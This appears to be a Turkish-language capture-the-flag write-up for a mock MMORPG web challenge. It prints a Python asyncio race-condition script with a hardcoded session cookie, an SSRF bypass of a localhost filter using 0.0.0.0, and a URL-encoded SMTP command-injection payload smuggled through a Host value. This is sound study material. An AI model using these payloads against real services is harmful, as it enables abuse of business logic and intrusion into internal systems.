Here is a new generation mmorpg game, where you can beat your friends, just finished crowdfunding campaign and available on your PC starting today. It's a bit buggy, but you know... I heard that developers of this game are really greedy.
Kuponlar ile level atlattik fakat level 30’un otesine kuponlar ile gecilmiyormus. Bir umit Race Condition vardir diye umit ettik ve denedik.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
import asyncio from aiohttp import ClientSession
asyncdeffetch(url, session): asyncwith session.get(url) as response: returnawait response.read()
asyncdefrun(n): sem = asyncio.Semaphore(n) asyncwith ClientSession(cookies={"session": "eyJ1aWQiOjgyOX0.DjeKvA.qA-vNIHjDFSPyuDwArZyGMQD984"}) as session: await asyncio.gather(*(asyncio.ensure_future(fetch("http://web-03.v7frkwrfyhsjtbpfcppnu.ctfz.one:80/donate/lvlup", session)) for _ inrange(n)))
30’uncu leveli gectigimizden dolayı Avatar ekleme ozelligi aktif olmus oldu.
Upload fonksiyonunda bir sey yoktu. Belki SSRF‘tir. 127.0.0.1 ve localhost engelliydi bu yüzden SSRF olgundan emin olduk. Ama 0.0.0.0 adresi calisiyordu. Port taramaya basladik.
25‘ci port yani SMTP portu acikmis. Host‘u manipüle ederek SMTP‘yi kullanmayı denedik.
1 2 3 4 5 6 7 8 9 10
Host: [0.0.0.0 helo 1v3m mail from:<[email protected]> rcpt to:<root> data subject: give me flag
1v3m . ]:25
Yeni satır ayıracı SMTP‘de delimiter olduğu için her satırın sonuna yeni satırın URL Encoded hali olan %0A‘yı ekledik ve son payloadımızın son hali
1
[0.0.0.0%0ahelo 1v3m%0amail from:<[email protected]>%0arcpt to:<root>%0adata%0asubject: give me flag%0a%0a1v3m%0a.%0a]:25